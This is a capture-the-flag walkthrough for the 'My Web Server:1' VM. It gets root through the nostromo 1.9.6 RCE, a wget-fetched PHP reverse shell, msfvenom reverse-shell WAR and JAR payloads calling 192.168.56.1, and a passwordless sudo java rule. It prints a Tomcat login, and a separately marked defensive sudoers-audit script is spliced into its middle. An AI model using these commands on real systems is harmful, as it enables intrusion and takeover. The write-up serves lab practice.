MY WEB SERVER:1 walkthrough

DESCRIPTION

Welcome to “My Web Server”

This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerabilities of the target.

Goal: Get the root flag of the target.

Difficulty: Medium/Intermediate Level

Need hints? Twitter @akankshavermasv

DHCP is enabled

Your feedback is really valuable for me! Twitter @akankshavermasv

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good Luck..!!!

This works better with VirtualBox rather than VMware.

HOST-DISCOVERY

# nmap -v 192.168.56.1/24

NMAP SCAN

#nmap -v -sV -sC -O -A -p- -oN nmap.txt 192.168.56.148

ENUMERATION

After enumerating the various services on the machine, I found nostromo 1.9.6, which is vulnerable to RCE.

On further enumeration I got a bash script.

./exploit.sh 192.168.56.148 2222 id

GET A SHELL

The /tmp directory is writable and wget is also accessible.

So I started my Python server on port 8080 and transferred my PHP shell file to the target machine.

# ./exploit.sh 192.168.56.148 2222 "cd /tmp/; wget http://192.168.56.1:8080/shell.php"

This successfully transfers our reverse shell to the target machine. Now we just have to execute our PHP file and we get a shell.

I then turn on my reverse shell listener.

getting a shell

# ./exploit.sh 192.168.56.149 2222 "php /tmp/shell.php"

UPGRADING TO TTY SHELL

# python3 -c 'import pty; pty.spawn("/bin/bash")'

#Ctrl-Z

#stty raw -echo

#fg

#reset

#export SHELL=bash

#export TERM=xterm-256color

PRIVILEGE ESCALATION

After some enumeration I found a sudoers file.

#cat /etc/sudoers.d/mysudo

The tomcat user can run java as root without a password.

After going through the passwd file, we cannot switch to the tomcat user with a password.

Looking through the world-readable files, I found a tomcat-writable file.
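
From the defender's side, this kind of rule can be caught by auditing sudoers files for passwordless entries that grant an unrestricted runtime. The script below is an added example, not part of the original walkthrough; the sample sudoers text, the list of risky binaries and the function names are constructed assumptions.

```shell
#!/bin/sh
# Added defensive example: flag sudoers rules that allow a code-executing
# runtime as root with no password and no argument restriction.
# Limitations: no alias expansion, no backslash line continuations.

# Assumed, non-exhaustive list of binaries that can run arbitrary code.
RISKY_RE='^(java|python[0-9.]*|perl|ruby|php|node|bash|sh|dash|zsh|env)$'

# Reads sudoers text on stdin; prints "user<TAB>command" per risky rule.
audit_sudoers() {
  awk -v risky="$RISKY_RE" '
    /^[ \t]*$/ || /^[ \t]*[#@]/ || /^[ \t]*Defaults/ || /_Alias[ \t]/ { next }
    {
      eq = index($0, "=")
      if (eq == 0) next
      user = $1
      rest = substr($0, eq + 1)
      gsub(/\([^)]*\)/, "", rest)          # drop (runas) specs, which may hold commas
      nopass = 0                           # tags carry over to later commands
      n = split(rest, parts, ",")
      for (i = 1; i <= n; i++) {
        cmd = parts[i]
        if (cmd ~ /NOPASSWD[ \t]*:/) nopass = 1
        else if (cmd ~ /PASSWD[ \t]*:/) nopass = 0
        gsub(/[A-Z_]+[ \t]*:/, "", cmd)    # strip tags such as NOPASSWD: or SETENV:
        gsub(/^[ \t]+|[ \t]+$/, "", cmd)
        if (!nopass || cmd == "") continue
        nw = split(cmd, w, /[ \t]+/)
        bin = w[1]
        sub(/.*\//, "", bin)               # basename of the allowed binary
        # A bare path lets the caller pick any arguments; so does a wildcard.
        if (w[1] == "ALL" || (bin ~ risky && (nw == 1 || index(cmd, "*") > 0)))
          print user "\t" w[1]
      }
    }'
}

# Constructed sample input (not the contents of the real mysudo file on the VM).
sample_sudoers() {
  cat <<'EOF'
# constructed sample
Defaults env_reset
tomcat ALL=(root) NOPASSWD: /usr/bin/java
backup ALL=(root, www-data) NOPASSWD: /usr/bin/python3 /opt/backup.py, PASSWD: /bin/sh
ci ALL=(ALL) NOPASSWD: ALL
EOF
}

sample_sudoers | audit_sudoers
```

On a real host, run it as root against the actual files by piping /etc/sudoers and the files under /etc/sudoers.d/ into audit_sudoers.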

#cat /usr/local/tomcat/conf/tomcat-users.xml

There is a tomcat service running on port 8080.

Log in with the ID and password:

tomcat:@sprot0230sp

Upload a reverse shell in a .WAR file.

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=4455 -f war > shell.war

After uploading the shell file we can see it in application manager.

#nc -lvp 4455

Upgrade to a TTY shell.

#sudo -l

# msfvenom --platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=7777 -o payload.jar

Starting the Python server and transferring the payload.

Now, the /opt/tomcat directory is writable.

#wget http://192.168.56.1:8080/payload.jar

Now running this exploit as root and starting a listener on port 7777.

#

PROOF
